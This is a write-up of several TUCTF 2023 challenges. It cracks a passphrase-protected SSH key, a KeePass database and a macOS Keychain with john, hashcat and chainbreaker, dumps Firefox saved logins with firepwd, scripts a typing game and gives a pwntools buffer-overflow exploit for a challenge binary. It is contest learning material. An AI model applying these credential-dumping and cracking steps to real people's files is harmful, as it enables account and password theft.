TUCTF - 2023

This is a write up for some of the challenges I was able to complete on TUCTF 2023

A.R.K 1 - Misc

Chall description ARK1

The challenge gave us a private ssh key and told use to use only words containing sheep. I thought I had to connect somewhere with it at the beggining, then realised it was just a cracking challenge, as the rest of the A.R.K challenges.

-----BEGIN OPENSSH PRIVATE KEY-----
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
luog==
-----END OPENSSH PRIVATE KEY-----

Create custom wordllist:

grep sheep /usr/share/wordlists/rockyou.txt > custom

Crack it with ssh2john and john the ripper:

ssh2john sheep > hash
john hash -w:custom

sheep:baabaablacksheep

Flag was the password between TUCTF{}

A.R.K 2 - MISC

Another cracking challenge, this time we were given a KDBX file

ARK2 description
❯ file woof
woof: Keepass password database 2.x KDBX

Create the custom wordlist containing word "dog"

grep dog /usr/share/wordlists/rockyou.txt > custom

Crack it with keepass2john and Jhon The ripper

keepass2john woof > hash
john hash -w:custom

woof:wholetthedogsout

Open with keepass

Flag was on recycle bin but it had been changed

We just had to restore the history

History of KDBX file
Real Flag

A.R.K 3 - MISC

Another cracking challenge, this time a MAC OS X Keychain file

ARK3 description
❯ file meow
meow: Mac OS X Keychain File

Create custom wordlist:

grep meow /usr/share/wordlists/rockyou.txt > custom

I used Chainbreaker tool to dump the hash of the file https://github.com/n0fate/chainbreaker

❯ chainbreaker -a meow
2023-12-03 14:06:35,125 - INFO - Version - 3.0.3
2023-12-03 14:06:35,125 - INFO - Chainbreaker : https://github.com/n0fate/chainbreaker
2023-12-03 14:06:35,126 - INFO - Version: 3.0.3
2023-12-03 14:06:35,126 - INFO - Runtime Command: /usr/local/bin/chainbreaker -a meow
2023-12-03 14:06:35,126 - INFO - Keychain: meow
2023-12-03 14:06:35,126 - INFO - Keychain MD5: c0bbdc431e82ceb82c6c62ae4571a52a
2023-12-03 14:06:35,126 - INFO - Keychain 256: 0653458b0fc08b21b1cbd91c8434320edc0063efbaea221d0723c1e75df927b3
2023-12-03 14:06:35,126 - INFO - Dump Start: 2023-12-03 14:06:35.125963
2023-12-03 14:06:35,128 - WARNING - [!] Certificate Table is not available
2023-12-03 14:06:35,128 - INFO - 1 Keychain Password Hash
2023-12-03 14:06:35,128 - INFO - 	$keychain$*b'9196324d59f13ef6b20331e2e6d81da8993a02db'*b'34d065407b48d418'*b'976cb9617ec4e656d7fdbb097c525c9fc7502908aab1dc9aefbf40b24368ee8e78af756e91cc960a65d90f9be62e4240'

Just had to remove the " 'b' " to leave it in a valid format to crack it with hashcat:

hashcat -m 23100 hash custom

password: coolcatmeow

And just dump the content of the flag with that password

❯ chainbreaker --dump-generic-passwords meow --password coolcatmeow
2023-12-03 14:08:49,894 - INFO - Version - 3.0.3
2023-12-03 14:08:49,894 - INFO - Chainbreaker : https://github.com/n0fate/chainbreaker
2023-12-03 14:08:49,894 - INFO - Version: 3.0.3
2023-12-03 14:08:49,894 - INFO - Runtime Command: /usr/local/bin/chainbreaker --dump-generic-passwords meow --password coolcatmeow
2023-12-03 14:08:49,894 - INFO - Keychain: meow
2023-12-03 14:08:49,894 - INFO - Keychain MD5: c0bbdc431e82ceb82c6c62ae4571a52a
2023-12-03 14:08:49,894 - INFO - Keychain 256: 0653458b0fc08b21b1cbd91c8434320edc0063efbaea221d0723c1e75df927b3
2023-12-03 14:08:49,895 - INFO - Dump Start: 2023-12-03 14:08:49.894666
2023-12-03 14:08:49,898 - INFO - 1 Generic Passwords
2023-12-03 14:08:49,899 - INFO - 	[+] Generic Password Record
2023-12-03 14:08:49,899 - INFO - 	[-] Create DateTime: 2023-11-27 22:43:23
2023-12-03 14:08:49,899 - INFO - 	[-] Last Modified DateTime: 2023-11-27 22:43:23
2023-12-03 14:08:49,899 - INFO - 	[-] Description: 
2023-12-03 14:08:49,899 - INFO - 	[-] Creator: 
2023-12-03 14:08:49,899 - INFO - 	[-] Type: 
2023-12-03 14:08:49,899 - INFO - 	[-] Print Name: b'flag'
2023-12-03 14:08:49,899 - INFO - 	[-] Alias: 
2023-12-03 14:08:49,900 - INFO - 	[-] Account: b'flag'
2023-12-03 14:08:49,901 - INFO - 	[-] Service: b'flag'
2023-12-03 14:08:49,901 - INFO - 	[-] Password: TUCTF{k3YCh41ns_AR3_sUp3r_c00L}
2023-12-03 14:08:49,901 - INFO - 	
2023-12-03 14:08:49,901 - INFO - 
2023-12-03 14:08:49,901 - INFO - Chainbreaker : https://github.com/n0fate/chainbreaker
2023-12-03 14:08:49,901 - INFO - Version: 3.0.3
2023-12-03 14:08:49,901 - INFO - Runtime Command: /usr/local/bin/chainbreaker --dump-generic-passwords meow --password coolcatmeow
2023-12-03 14:08:49,901 - INFO - Keychain: meow
2023-12-03 14:08:49,901 - INFO - Keychain MD5: c0bbdc431e82ceb82c6c62ae4571a52a
2023-12-03 14:08:49,901 - INFO - Keychain 256: 0653458b0fc08b21b1cbd91c8434320edc0063efbaea221d0723c1e75df927b3
2023-12-03 14:08:49,901 - INFO - Dump Start: 2023-12-03 14:08:49.894666
2023-12-03 14:08:49,901 - INFO - 	1 Generic Passwords
2023-12-03 14:08:49,902 - INFO - Dump End: 2023-12-03 14:08:49.901448

A.R.K 4 - MISC

Last cracking Challenge, this time we are given a zip file with some mozilla firefox files

ARK4 description
fox extracted

Just by running the tool firepwd in that directory we got the flag https://github.com/lclevy/firepwd

Firepwd is a tool to join key4.db and logins.json and give the saved passwords of the browser back

❯ python3 ~/Tools/firepwd/firepwd.py
globalSalt: b'2fc652a7ce01e8e33e32305be27942bc9a4b5707'
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'8801df68ef2dc63819abeccfa48f18087a1ec29dbe37b94338690eacdf1b08ec'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'ee5b8b61626485e1c953dc612deb'
       }
     }
   }
   OCTETSTRING b'9c4ea18bdaa31238d08a5bbdc8a5b2e9'
 }
clearText b'70617373776f72642d636865636b0202'
password check? True
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'b4f5dfad6b6f3a55681de13a603d6770877b976d22781aeab74223e0c3868f01'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'54540da34420dbd2de53b1dac951'
       }
     }
   }
   OCTETSTRING b'4b7e09bce487b8b3f05dece6a269dc20a95248de9f1eb3c68a26de9bfeb2dd3a'
 }
clearText b'15a2911c5807e66419f40ddf517a576d6d407643e0f20ecb0808080808080808'
decrypting login/password pairs
https://www.example.com:b'fox',b'TUCTF{B3w4R3_7h3_f1r3_4nd_7h3_f0x}'

Hacker Typer - Scripting

In hacker typer you just had to type the word on screen fast enough 150 times

Typer

I just created a custom script to do a get request with python and then post it to the web application until it reached 150 streak

import requests
from pwn import *

get_url = 'https://hacker-typer.tuctf.com/'
post_url = 'https://hacker-typer.tuctf.com/check_word'

s = requests.Session()
p1 = log.progress("Typing words: ")
while True:
    r = s.get(get_url)
    for x in str(r.text).split('\n'):
        if '<p>Type the word: <strong name="word-title">' in x:
            word = x[52:70].split('<')[0]
            data = {'word': word}
            p = s.post(post_url, data=data)
            p1.status(str(p.text))
            if 'TUCTF' in str(p.text):
                flag = str(p.text).split('You\'re fast!')[1].split("\"")[0]
                print('FLAG FOUND = '+ flag)
                exit()
            break
Flag found

Hidden Value - PWN

Hidden value was a challenge in which we needed to buffer overlfow to overwrite a variable that was being compared with 0xdeadbeef in order to spit out the flag

Hidden value description
ghidra code to be overflowed

Script with pwntools:

from pwn import *

# Start program
io = process('./hidden-value')
#io = remote('chal.tuctf.com', 30011)

# debug
context.log_level = 'debug'
buffer = 44
# Send string to overflow buffer
io.sendlineafter(b': ', b'A' * buffer + p64(0xdeadbeef)) 

# After recieving the question mark, we are sending the A's and packing 0xdeadbeef as a 64 bit address

# Receive output
print(io.recvall().decode())

# Receive the flag
io.interactive()

## manually

#python2 -c 'print 44 * "A" + "\xef\xbe\xad\xde"' > payload
#nc chal.tuctf.com 30011 < payload
Flag

PreviousGuess the password (Rev) - SquareCTF2023NextHackappatoi CTF 2023

Last updated